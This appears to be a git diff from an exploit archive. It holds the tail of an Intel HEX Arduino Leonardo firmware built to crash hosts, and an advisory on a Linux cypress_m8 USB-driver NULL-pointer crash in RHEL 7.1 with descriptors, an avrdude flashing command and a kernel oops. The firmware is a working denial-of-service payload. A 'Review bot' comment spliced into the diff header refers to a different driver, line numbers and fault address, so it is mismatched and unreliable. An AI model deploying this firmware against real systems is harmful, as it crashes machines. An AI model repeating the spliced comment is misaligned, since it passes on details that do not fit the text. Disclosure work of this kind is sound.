+:10017000D9F725E0A4E6B5E001C01D92AF37B2077C +:10018000E1F70E94C8000C9404070C940000089545 +:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421 +:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B +:1001B00083E00E94300361E087E00E94300361E049 +:1001C00088E00E9430030E9459067E012AE9E20E6F +:1001D000F11C84E093E0D70111969C938E9389E003 +:1001E00094E013969C938E93129782E2E2E1F1E001 +:1001F0009E012F5F3F4F6901D90101900D928A95B1 +:10020000E1F788E1E4E3F1E0DE01939601900D92DD +:100210008A95E1F782E1ECE4F1E0DE01DB96019002 +:100220000D928A95E1F789E0EEE5F1E0DE01A05953 +:10023000BF4F01900D928A95E1F72A593F4F99E0FF +:10024000992ED901E92D1D92EA95E9F78E010957FA +:100250001F4F87E0E7E6F1E0D80101900D928A9503 +:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189 +:1002700001900D928A95E1F7AE0147585F4F87E0F4 +:10028000E5E7F1E0DA0101900D928A95E1F75E0170 +:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D +:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172 +:1002B0001D92EA95E9F7E3E0DC011996EC93D90188 +:1002C0009C92F4E01196FC9311971496EC93F9012B +:1002D000DC01292D01900D922A95E1F7FE01EC56E3 +:1002E000FF4FDC011B96FC93EE931A971D96BC9270 +:1002F000AE921C971183008373836283558344837A +:100300000C5211092CE0F80111922A95E9F721E02D +:10031000D80119962C931997FE01E059FF4F0190CF +:100320000D929A94E1F7F8019387828761E088E063 +:100330000E9469038BE492E00E94650688E892E0DF +:100340000E94650687EC92E00E94650686E093E0D5 +:100350000E94650682E493E00E9465068FE793E0C1 +:100360000E94650684EA93E00E9465068BEE93E0A6 +:100370000E94650683E00E949F03892B09F047C015 +:100380005E01F3E2AF0EB11C8824839482E1982EC3 +:1003900084E194E00E946506BF92AF92DF92CF9213 +:1003A000FF92EF921F928F921F930F932DB73EB73C +:1003B000225131090FB6F8943EBF0FBE2DBFADB725 +:1003C000BEB71196FE01FB96892D01900D928A957C +:1003D000E1F78DE695E00E94030668E873E180E0AE +:1003E00090E00E947B028DE695E00E944E0660E060 +:1003F00087E00E94690368E873E180E090E00E9472 +:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E +:1004100070E080E090E00E947B02ACCF1F920F92D0 +:100420000FB60F9211242F933F938F939F93AF9307 
+:10043000BF938091650590916605A0916705B09185 +:1004400068053091640523E0230F2D3720F40196D1 +:10045000A11DB11D05C026E8230F0296A11DB11DE7 +:10046000209364058093650590936605A0936705C6 +:10047000B09368058091690590916A05A0916B051C +:10048000B0916C050196A11DB11D809369059093F3 +:100490006A05A0936B05B0936C05BF91AF919F91D6 +:1004A0008F913F912F910F900FBE0F901F90189535 +:1004B0003FB7F8948091690590916A05A0916B050A +:1004C000B0916C0526B5A89B05C02F3F19F0019689 +:1004D000A11DB11D3FBF6627782F892F9A2F620F6C +:1004E000711D811D911D42E0660F771F881F991FA6 +:1004F0004A95D1F70895CF92DF92EF92FF92CF9372 +:10050000DF936B017C010E945802EB01C114D104FE +:10051000E104F10479F00E9458026C1B7D0B683EE7 +:100520007340A0F381E0C81AD108E108F108C8516E +:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029 +:100540000895789484B5826084BD84B5816084BD4B +:1005500085B5826085BD85B5816085BDEEE6F0E03C +:10056000808181608083E1E8F0E010828081826098 +:100570008083808181608083E0E8F0E08081816019 +:100580008083E1E9F0E08081826080838081816006 +:100590008083E0E9F0E0808181608083E1ECF0E03D +:1005A000808184608083808182608083808181609B +:1005B0008083E3ECF0E0808181608083E0ECF0E018 +:1005C000808182608083E2ECF0E0808181608083C2 +:1005D000EAE7F0E0808184608083808182608083AC +:1005E000808181608083808180688083089590E02D +:1005F000FC013197EE30F10590F5EA5AFF4F0C946B +:10060000AB09809180008F7703C0809180008F7D3F +:1006100080938000089584B58F7702C084B58F7D64 +:1006200084BD0895809190008F7707C080919000DD +:100630008F7D03C080919000877F80939000089504 +:100640008091C0008F7703C08091C0008F7D809320 +:10065000C00008958091C200877F8093C2000895F2 +:10066000CF93DF9390E0FC01EA51FF4F2491FC010E +:10067000EC5FFE4F8491882349F190E0880F991F29 +:10068000FC01E25CFE4FA591B491805D9E4FFC01A0 +:10069000C591D4919FB7611108C0F8948C912095B1 +:1006A00082238C93888182230AC0623051F4F894AB +:1006B0008C91322F309583238C938881822B888371 +:1006C00004C0F8948C91822B8C939FBFDF91CF91C3 +:1006D00008950F931F93CF93DF931F92CDB7DEB78B +:1006E000282F30E0F901E853FF4F8491F901EA51D6 
+:1006F000FF4F1491F901EC5FFE4F04910023C9F004 +:10070000882321F069830E94F7026981E02FF0E0DD +:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7 +:100720008C91611103C01095812301C0812B8C93A2 +:100730009FBF0F90DF91CF911F910F910895CF939D +:10074000DF93282F30E0F901E853FF4F8491F9013E +:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5 +:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5 +:10077000EE5DFE4FA591B4912C912D2381E090E088 +:1007800021F480E002C080E090E0DF91CF910895F5 +:10079000615030F02091F100FC0120830196F8CFE8 +:1007A000289884E680937D0508951092E9001092C0 +:1007B00071051092700590936F0580936E050895F2 +:1007C000FF920F931F93CF93DF93F82E8B01EA01D3 +:1007D000BA01C8010E94A606F80120E030E08EEFC1 +:1007E0002C173D0791F1F7FE02C0A49101C0A08132 +:1007F000609170057091710540916E0550916F0583 +:1008000064177507ACF49091E8009570E1F390914E +:10081000E80092FD1CC0A093F100A0917005B0917A +:1008200071051196AF73BB27AB2B11F48093E800D1 +:10083000A0917005B09171051196B0937105A093C8 +:1008400070052F5F3F4F3196CBCFC90102C08FEFAC +:100850009FEFDF91CF911F910F91FF9008951F920D +:100860000F920FB60F9211246F927F928F929F92E8 +:10087000AF92BF92CF92DF92EF92FF920F931F93AE +:100880002F933F934F935F936F937F938F939F9398 +:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3 +:1008A0006297DEBFCDBF1092E9008091E80083FF20 +:1008B00046C168E0CE010A960E94C80382EF809389 +:1008C000E8009A8597FF05C08091E80080FFFCCF83 +:1008D00003C08EEF8093E800892F807609F023C152 +:1008E0008B85811105C01092F1001092F10020C19A +:1008F000282F2D7F213009F41BC1853049F48091C8 +:10090000E80080FFFCCF8C8580688093E30010C1F5 +:10091000863009F0E1C02D8508891989223009F057 +:10092000B3C0EC848E2D90E0209173053091740556 +:10093000821793070CF09FC00E94D5031F92EF927D +:100940008DE394E09F938F930E9483068CE0E89E52 +:1009500070011124E0917505F0917605EE0DFF1DF3 +:1009600089E0DE01119601900D928A95E1F7C801A8 +:100970000E94D50349E050E0BE016F5F7F4F80E0E9 +:100980000E94E0030F900F900F900F90C12CD12C7C +:10099000612C712C33E7A32E34E0B32E4AEA842E67 +:1009A00044E0942EE0917505F0917605EE0DFF1D63 
+:1009B000818590E0681679060CF0BAC07F926F923C +:1009C000BF92AF920E948306E0917505F091760583 +:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5 +:1009E00080E00E94E0030F900F900F900F9000E0C6 +:1009F00010E0E0917505F0917605EE0DFF1D028483 +:100A0000F385E02DEC0DFD1D818590E00817190799 +:100A10005CF51F930F939F928F920E948306E09143 +:100A20007505F0917605EE0DFF1D0284F385E02D2E +:100A3000EC0DFD1DC801880F991FA485B585A80F71 +:100A4000B91F4D915C910284F385E02DE80FF91FE9 +:100A50006081718180E00E94E0030F5F1F4F0F9063 +:100A60000F900F900F90C5CF8FEF681A780A8EE025 +:100A7000C80ED11C97CF8FED94E09F938F930E9467 +:100A800083060F900F9058C0C8012A8B0E94D5038F +:100A90002A892130C1F0233009F04EC08C851F9285 +:100AA0008F9389EF94E09F938F930E94830642E097 +:100AB00050E062E871E080E00E94E0030F900F9048 +:100AC0000F900F9035C04091000150E060E071E060 +:100AD00080E00E94E0032CC0873071F1883021F45F +:100AE00081E08093F10024C0893011F5937021F5E5 +:100AF000EDE4F1E081E021E096E38093E9002093CA +:100B0000EB0034913093EC009093ED008F5F3196C1 +:100B1000843099F78EE78093EA001092EA008C8582 +:100B20008093720505C0888999890E94D50304C005 +:100B30008EEF8093E80003C081E28093EB00629621 +:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE +:100B5000EF91BF91AF919F918F917F916F915F9135 +:100B60004F913F912F911F910F91FF90EF90DF9048 +:100B7000CF90BF90AF909F908F907F906F900F908D +:100B80000FBE0F901F9018951F920F920FB60F92E5 +:100B900011248F939F938091E1001092E10083FFD5 +:100BA0000FC01092E90091E09093EB001092EC00DE +:100BB00092E39093ED001092720598E09093F0000C +:100BC00082FF1AC080917E05882339F080917E05CE +:100BD000815080937E05882369F080917D0588236C +:100BE00059F080917D05815080937D05811104C06D +:100BF000289A02C05D9AF1CF9F918F910F900FBEFE +:100C00000F901F901895CF93DF93CDB7DEB782E199 +:100C1000FE013596A0E0B1E001900D928A95E1F7D2 +:100C20008F89988D9093760580937505898D9A8D1F +:100C300090937405809373058B8D9C8D90937C05A8 +:100C400080937B058D8D9E8D90937A058093790599 +:100C50008F8D98A1909378058093770510927205F7 +:100C600081E08093D70080EA8093D80082E189BD3B 
+:100C700009B400FEFDCF61E070E080E090E00E94EA +:100C80007B0280E98093D8008CE08093E200109290 +:100C9000E000559A209ADF91CF91089581E08093EA +:100CA000E00008959091C80095FFFCCF8093CE009E +:100CB00008951092CD0087E68093CC0088E1809360 +:100CC000C9008EE08093CA0008950F931F93CF93BD +:100CD000DF93EC018C01FE0101900020E9F73197D0 +:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E +:100CF000F80181918F010E945206EDCFDF91CF91D3 +:100D00001F910F910895CF93DF93CDB7DEB7DA959A +:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6 +:100D2000419151919F0160E071E0CE0101960E94D6 +:100D30000707CE0101960E946506D3950FB6F89479 +:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE +:100D5000AF92BF92CF92DF92EF92FF920F931F93C9 +:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E +:100D70003F932F9389839A830E9483068981882ECB +:100D80009A81992E0F900F9000E010E08EE5E82EEA +:100D900085E0F82E91E1C92E94E0D92E0A151B05A5 +:100DA000E4F4F40181914F0190E09F938F93FF92BF +:100DB000EF920E9483060F5F1F4FC8018F70992723 +:100DC0000F900F900F900F90892B41F7DF92CF92E9 +:100DD0000E9483060F900F90E1CF81E194E09F93F2 +:100DE0008F930E9483060F900F900F900F90DF91CA +:100DF000CF911F910F91FF90EF90DF90CF90BF9018 +:100E0000AF909F908F900895F8940C94E809AEE00D +:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8 +:100E20004C831A83098377FF02C060E070E8615049 +:100E300071097E836D83A901BC01CE0101960E94D8 +:100E400033074D815E8157FD0AC02F8138854217D7 +:100E500053070CF49A01F801E20FF31F10822E964B +:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB +:100E7000B1097C016B018A01FC0117821682838112 +:100E800081FFBDC1CE0101964C01F7019381F601AE +:100E900093FD859193FF81916F01882309F4ABC184 +:100EA000853239F493FD859193FF81916F018532ED +:100EB00029F4B70190E00E941B09E7CF512C312C97 +:100EC00020E02032A0F48B3269F030F4803259F007 +:100ED000833269F420612CC08D3239F0803339F4CB +:100EE000216026C02260246023C0286021C027FD25 +:100EF00027C030ED380F3A3078F426FF06C0FAE00C +:100F00005F9E300D1124532E13C08AE0389E300DA1 +:100F10001124332E20620CC08E3221F426FD6BC1C9 +:100F2000206406C08C3611F4206802C0883641F473 
+:100F3000F60193FD859193FF81916F018111C1CFDE +:100F4000982F9F7D9554933028F40C5F1F4FFFE33B +:100F5000F9830DC0833631F0833771F0833509F0A2 +:100F60005BC022C0F801808189830E5F1F4F44243B +:100F70004394512C540115C03801F2E06F0E711CDE +:100F8000F801A080B18026FF03C0652D70E002C08B +:100F90006FEF7FEFC5012C870E9410092C018301A0 +:100FA0002C852F77222E17C03801F2E06F0E711CAE +:100FB000F801A080B18026FF03C0652D70E002C05B +:100FC0006FEF7FEFC5012C870E9405092C012C854E +:100FD0002068222E830123FC1BC0832D90E048163D +:100FE0005906B0F4B70180E290E00E941B093A94E0 +:100FF000F4CFF50127FC859127FE81915F01B701B0 +:1010000090E00E941B0931103A94F1E04F1A510808 +:101010004114510471F7E5C0843611F0893639F571 +:10102000F80127FF07C060817181828193810C5F85 +:101030001F4F08C060817181882777FD8095982FA8 +:101040000E5F1F4F2F76B22E97FF09C090958095A7 +:10105000709561957F4F8F4F9F4F2068B22E2AE089 +:1010600030E0A4010E944D09A82EA81844C085377D +:1010700029F42F7EB22E2AE030E025C0F22FF97F2E +:10108000BF2E8F36C1F018F4883579F0B4C08037A0 +:1010900019F0883721F0AFC02F2F2061B22EB4FE97 +:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D +:1010B0009660B92E06C028E030E005C020E130E09F +:1010C00002C020E132E0F801B7FE07C06081718103 +:1010D000828193810C5F1F4F06C06081718180E027 +:1010E00090E00E5F1F4FA4010E944D09A82EA81882 +:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428 +:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0 +:101110007A2C2B2D03C07A2C01C0752C24FF0DC016 +:10112000FE01EA0DF11D8081803311F4297E09C092 +:1011300022FF06C07394739404C0822F867809F04E +:10114000739423FD13C020FF06C05A2C731418F4A7 +:10115000530C5718732C731468F4B70180E290E0B5 +:101160002C870E941B0973942C85F5CF731410F4FF +:10117000371801C0312C24FF12C0B70180E390E082 +:101180002C870E941B092C8522FF17C021FF03C05A +:1011900088E590E002C088E790E0B7010CC0822F9C +:1011A000867859F021FD02C080E201C08BE227FD64 +:1011B0008DE2B70190E00E941B09A51438F4B70135 +:1011C00080E390E00E941B095A94F7CFAA94F4019F +:1011D000EA0DF11D8081B70190E00E941B09A1106A +:1011E000F5CF332009F451CEB70180E290E00E94A0 
+:1011F0001B093A94F6CFF7018681978102C08FEFE1 +:101200009FEF2C96E2E10C94CD09FC010590615012 +:1012100070400110D8F7809590958E0F9F1F08950C +:10122000FC016150704001900110D8F780959095B5 +:101230008E0F9F1F08950F931F93CF93DF93182F47 +:10124000092FEB018B8181FD03C08FEF9FEF20C041 +:1012500082FF10C04E815F812C813D814217530770 +:101260007CF4E881F9819F012F5F3F4F3983288308 +:10127000108306C0E885F985812F0995892B29F708 +:101280002E813F812F5F3F4F3F832E83812F902FF1 +:10129000DF91CF911F910F910895FA01AA2728306D +:1012A00051F1203181F1E8946F936E7F6E5F7F4F33 +:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF +:1012C000781F891F9A1FA11D680F791F8A1F911D02 +:1012D000A11D6A0F711D811D911DA11D20D009F452 +:1012E00068943F912AE0269F11243019305D319394 +:1012F000DEF6CF010895462F4770405D4193B3E07D +:101300000FD0C9F7F6CF462F4F70405D4A3318F023 +:10131000495D31FD4052419302D0A9F7EACFB4E0D4 +:10132000A6959795879577956795BA95C9F700978C +:101330006105710508959B01AC010A2E069457952D +:10134000479537952795BA95C9F7620F731F841F84 +:10135000951FA01D0895EE0FFF1F0590F491E02D3D +:1013600009942F923F924F925F926F927F928F9249 +:101370009F92AF92BF92CF92DF92EF92FF920F9324 +:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E +:10139000F894DEBF0FBECDBF09942A8839884888EB +:1013A0005F846E847D848C849B84AA84B984C88481 +:1013B000DF80EE80FD800C811B81AA81B981CE0F78 +:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D +:0413D000F894FFCFBF +:1013D4001201000200000040AD0BEFBE000101024B +:1013E4000001220342006100640020004200410029 +:1013F40042004500250078002500780025006E0095 +:1014040025007000180342004100440020004300FE +:10141400300046004600450045002100120100024C +:10142400000000400D050901000101020301090249 +:10143400270001010000FA0705810304040C0705D5 +:10144400010204000C0705820104000C07000700D8 +:101454000700480100500072006F006C00690066CC +:101464000069006300000A550000006BFD180A00C3 +:10147400809F0AB901312B940A8101128946001315 +:10148400000257028B0A5E0AF80A5F01F212010099 +:1014940002010000400D055702000101020301B9D9 
+:1014A4000A0100F80A5F0A810A220342006100640B +:1014B400002000420041004200450025007800253C +:1014C40000780025006E00250070001803420041DA +:1014D400004400200043003000460046004500451B +:1014E40000210012010002010000400D0557020016 +:1014F400010102030109040000030100000003F2DA +:101504000AEC0A0902270001010000FA01AB0A09EA +:101514000400000301000000090200202020202014 +:101524005F5F5F5F5F5F5F5F2020202020202020BF +:1015340020202020202020202020202020202020A7 +:1015440020205F5F5F5F5F205F5F20205F2020209F +:101554002020205F5F0A0D00202020202F205F5FC5 +:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3 +:101574005F5F20205F5F5F5F5F20202020202F209F +:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3 +:10159400202F5F5F0A0D002020202F202F202020E5 +:1015A4002F205F5F205C2F205F5F20602F205F5F14 +:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A +:1015C400205C2F205F5F2F202F205F5F5F2F202F55 +:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009 +:1015E4002F202F202F202F5F2F202F202F5F2F2001 +:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0 +:101604002F202F5F2F202F202F5F5F2F202C3C0AAD +:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07 +:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F +:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4 +:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044 +:101654003C3C2043485241534820414E59204F506E +:1016640045524154494E472053595354454D203E09 +:101674003E0A0D00203C3C202863292053657267F4 +:10168400656A20536368756D696C6F20323031353B +:101694002C204F70656E536F7572636520536563BC +:1016A40075726974792052616C66205370656E6E30 +:1016B4006562657267203E3E0A0D000A3E3E205078 +:1016C4007265737320627574746F6E20746F207307 +:1016D4007461727420657865637574696F6E2E2EFB +:1016E4002E0A0D005B44454255475D2045786563ED +:1016F400757465207061796C6F616420300A0D0027 +:10170400526563762D446174613A0A0D005B444569 +:101714004255475D200953656E6420436F6E6669C8 +:101724006775726174696F6E44657363726970740E +:101734006F720928696E6465783A2569292E2E2E00 +:101744000D0A005B44454255475D200953656E64AC +:1017540020496E74657266616365204465736372C3 
+:101764006970746F720928696E7465726661636565
+:101774003A2569292E2E2E0D0A005B444542554711
+:101784005D200953656E6420456E64706F696E74E4
+:101794002044657363726970746F720928656E649E
+:1017A400706F696E743A2569292E2E2E0D0A005B1E
+:1017B40044454255475D203C3C70616E6963206D31
+:1017C4006F64653F3E3E0D0A005B44454255475DEC
+:1017D4002009203E3E20537472696E67204465736D
+:1017E40063726970746F72207265717565737420A9
+:1017F4002D2073656E64696E67206D616C666F720F
+:101804006D656420737472696E67212073657475E5
+:10181400702E7756616C75654C203D3D2025690D11
+:101824000A005B48455844554D505D0A0D0025306B
+:041834003258200006
+:00000001FF
+--
\ No newline at end of file
diff --git a/platforms/linux/dos/39542.txt b/platforms/linux/dos/39542.txt
new file mode 100755
index 000000000..852522757
--- /dev/null
+++ b/platforms/linux/dos/39542.txt
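Review bot: The NULL pointer on line 386 of the excerpt is `port->serial->port[1]` itself, not its `interrupt_in_urb`: the oops is a read fault (`Oops: 0000`, `CR2: 0000000000000158`) and the faulting instruction `48 8b 92 58 01 00 00` decodes to `mov 0x158(%rdx),%rdx`, i.e. the load of `interrupt_in_urb` through a NULL `port[1]`, which presumably means usb-serial allocated only one port for an interface carrying a single interrupt-in endpoint. A guard that only tests the urb would therefore still crash; the check has to cover both pointers and belongs before the `kzalloc` on line 381 so nothing needs freeing on the error path: `if (!port->serial->port[1] || !port->serial->port[1]->interrupt_in_urb) return -ENODEV;`. Two inaccuracies in the listing are worth fixing before this text is cited: the third endpoint's `bmAttribut: 0x1` denotes an isochronous endpoint, not bulk (bmAttributes bits 1:0 — 1 = isochronous, 2 = bulk, 3 = interrupt), and line 394 is missing between 393 and 395 in the code excerpt. Upstream later added a two-part check of this shape to mct_u232_port_probe and, if I remember correctly, the issue was assigned CVE-2016-3136 — both should be confirmed rather than relying on the advisory's "CVE: not yet assigned".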
@@ -0,0 +1,646 @@
+OS-S Security Advisory 2016-07
+Linux cypress_m8 Nullpointer Dereference
+
+Date: March 4th, 2016
+Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
+CVE: not yet assigned
+CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
+Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid
+USB device descriptors (cypress_m8 driver)
+Severity: Critical. The Kernel panics. A reboot is required.
+Ease of Exploitation: Trivial
+Vulnerability type: Wrong input validation
+Products: RHEL 7.1 including all updates
+Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the
+CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
+Vendor: Red Hat
+Vendor contacted: November, 12th 2015
+PDF of Advisory: https://os-s.net/advisories/OSS-2016-07_cypress_m8.pdf
+
+Abstract:
+The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB
+device which requires the requiring the cypress_m8 driver.
+
+Detailed product description:
+We confirmed the bug on the following system:
+RHEL 7.1
+Kernel 3.10.0-229.20.1.el7.x86_64
+Further products or kernel versions have not been tested.
+How reproducible: Always
+Actual results: Kernel crashes.
+
+Description:
+The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo
+(github.com/schumilo) using the following device descriptor:
+
+[*] Device-Descriptor
+bLength: 0x12
+bDescriptorType: 0x1
+bcdUSB: 0x200
+bDeviceClass: 0x3
+bDeviceSubClass: 0x0
+bDeviceProtocol: 0x0
+bMaxPacketSize: 0x40
+idVendor: 0x4b4
+idProduct: 0x5500
+bcdDevice: 0x100
+iManufacturer: 0x1
+iProduct: 0x2
+iSerialNumbers: 0x3
+bNumConfigurations: 0x1
+
+This is the configuration descriptor containing only one interrupt-endpoint-
+descriptor (IN-direction).
+The cypress_m8 driver assumes that there will be at least two endpoint-
+descriptors configured for interrupt-transfer and each used for one direction.
+Since there is no sanity check, it is possible that the kernel tries to
+dereference a null-pointer.
+This results in a crash of the system.
+
+****
+$ nm cypress_m8.ko.debug | grep cypress_generic_port_probe
+00000000000008d0 t cypress_generic_port_probe
+$ addr2line -e cypress_m8.ko.debug 0x9D0
+/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_
+64/drivers/usb/serial/cypress_m8.c:488
+****
+
+**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/serial/cypress_m8.c)
+...
+482 if (interval > 0) {
+483 priv->write_urb_interval = interval;
+484 priv->read_urb_interval = interval;
+485 dev_dbg(&port->dev, "%s - read & write intervals forced to %d\n",
+486 __func__, interval);
+487 } else {
+488 priv->write_urb_interval = port->interrupt_out_urb->interval; /*
+possible null-pointer dereference */
+489 priv->read_urb_interval = port->interrupt_in_urb->interval; /*
+possible null-pointer dereference */
+490 dev_dbg(&port->dev, "%s - intervals: read=%d write=%d\n",
+491 __func__, priv->read_urb_interval,
+492 priv->write_urb_interval);
+493 }
+...
+****
+
+[*] Configuration-Descriptor
+bLength: 0x9
+bDescriptorType: 0x2
+wTotalLength: 0x27
+bNumInterfaces: 0x1
+bConfigurationValue: 0x1
+iConfiguration: 0x0
+bmAttributes: 0x0
+bMaxPower: 0x31
+[*] Interface-Descriptor
+bLength: 0x9
+bDescriptorType: 0x4
+bInterfaceNumber: 0x0
+bAlternateSetting: 0x0
+bNumEndpoints: 0x3
+bInterfaceClass: 0x0
+bInterfaceSubClass: 0x0
+bInterfaceProtocol: 0x0
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x81 ï?? IN-Direction
+bmAttribut: 0x3 ï?? Interrupt-Transfer
+wMaxPacketSize: 0x404
+bInterval: 0xc
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x1 ï??OUT-Direction
+bmAttribut: 0x2 ï??Bulk-Transfer
+wMaxPacketSize: 0x4
+bInterval: 0xc
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x82 ï??IN-Direction
+bmAttribut: 0x1 ï??Bulk-Transfer
+wMaxPacketSize: 0x4
+bInterval: 0xc
+
+Proof of Concept:
+For a proof of concept, we are providing an Arduino Leonardo firmware file. This
+firmware will emulate the defective USB device.
+
+avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U
+flash:w:binary.hex
+
+The firmware has been attached to this bug report.
+To prevent the automated delivery of the payload, a jumper may be used to
+connect port D3 and 3V3!
+
+Severity and Ease of Exploitation:
+The vulnerability can be easily exploited. Using our Arduino Leonardo firmware,
+only physical access to the system is required.
+
+Vendor Communication:
+We contacted Red Hat on the November, 12th 2015.
+To this day, no security patch was provided by the vendor.
+Since our 90-day Responsible Discourse deadline is expired, we publish this
+Security Advisory.
+
+References:
+https://bugzilla.redhat.com/show_bug.cgi?id=1283368
+
+Kernel Stacktrace:
+
+[ 40.138619] usb 1-1: new full-speed USB device number 2 using xhci_hcd
+[ 40.366581] usb 1-1: New USB device found, idVendor=04b4, idProduct=5500
+[ 40.373039] usb 1-1: New USB device strings: Mfr=1, Product=2,
+SerialNumber=3
+[ 40.381857] usb 1-1: Product: Ä?
+[ 40.385232] usb 1-1: Manufacturer: Ä?
+[ 40.389227] usb 1-1: SerialNumber: %
+[ 40.397815] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc
+says 96 microframes
+[ 40.457689] usbcore: registered new interface driver cypress_m8
+[ 40.469365] usbserial: USB Serial support registered for DeLorme Earthmate
+USB
+[ 40.480135] usbserial: USB Serial support registered for HID->COM RS232
+Adapter
+[ 40.494974] usbserial: USB Serial support registered for Nokia CA-42 V2
+Adapter
+[ 40.502183] cypress_m8 1-1:1.0: HID->COM RS232 Adapter converter detected
+[ 40.512683] BUG: unable to handle kernel NULL pointer dereference at
+00000000000000a8
+[ 40.513393] IP: [] cypress_generic_port_probe+0x100/0x1a0
+[cypress_m8]
+[ 40.513393] PGD 0
+[ 40.513393] Oops: 0000 [#1] SMP
+[ 40.513393] Modules linked in: cypress_m8(+) ip6t_rpfilter ip6t_REJECT
+ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc
+ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6
+nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter
+ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat
+nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter
+ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper
+drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c
+sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix
+libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod
+[ 40.513393] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted
+3.10.0-229.14.1.el7.x86_64 #1
+[ 40.513393] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
+rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
+[ 40.513393] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000
+[ 40.513393] RIP: 0010:[] []
+cypress_generic_port_probe+0x100/0x1a0 [cypress_m8]
+[ 40.513393] RSP: 0018:ffff88000bd238d0 EFLAGS: 00010246
+[ 40.513393] RAX: 0000000000000000 RBX: ffff88000c5149c0 RCX: ffff88000bd23fd8
+[ 40.513393] RDX: 0000000000000000 RSI: ffffffff81447840 RDI: ffff88000aeff040
+[ 40.513393] RBP: ffff88000bd238f0 R08: 0000000000000000 R09: ffff88000fc16380
+[ 40.513393] R10: ffffea000030eb00 R11: ffffffff8141968b R12: ffff88000bcd3800
+[ 40.513393] R13: 0000000000000000 R14: ffff88000bcd3ab0 R15: ffffffffa0396200
+[ 40.513393] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000)
+knlGS:0000000000000000
+[ 40.513393] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
+[ 40.513393] CR2: 00000000000000a8 CR3: 000000000c572000 CR4:
+00000000000006f0
+[ 40.513393] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
+0000000000000000
+[ 40.513393] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
+[ 40.513393] Stack:
+[ 40.513393] ffff88000bcd3ab0 ffff88000bcd3800 ffff88000bcd3800 ffffffffa0396200
+[ 40.513393] ffff88000bd23910 ffffffffa0393b04 ffff88000bcd3ab0 0000000000000000
+[ 40.513393] ffff88000bd23940 ffffffff81461cf6 ffff88000bcd3ab0 ffff88000bcd3ab0
+[ 40.513393] Call Trace:
+[ 40.513393] [] cypress_hidcom_port_probe+0x14/0x80
+[cypress_m8]
+[ 40.513393] [] usb_serial_device_probe+0x56/0x110
+[ 40.513393] [] driver_probe_device+0x87/0x390
+[ 40.513393] [] ? driver_probe_device+0x390/0x390
+[ 40.513393] [] __device_attach+0x3b/0x40
+[ 40.513393] [] bus_for_each_drv+0x6b/0xb0
+[ 40.513393] [] device_attach+0x88/0xa0
+[ 40.513393] [] bus_probe_device+0x98/0xc0
+[ 40.513393] [] device_add+0x4c4/0x7a0
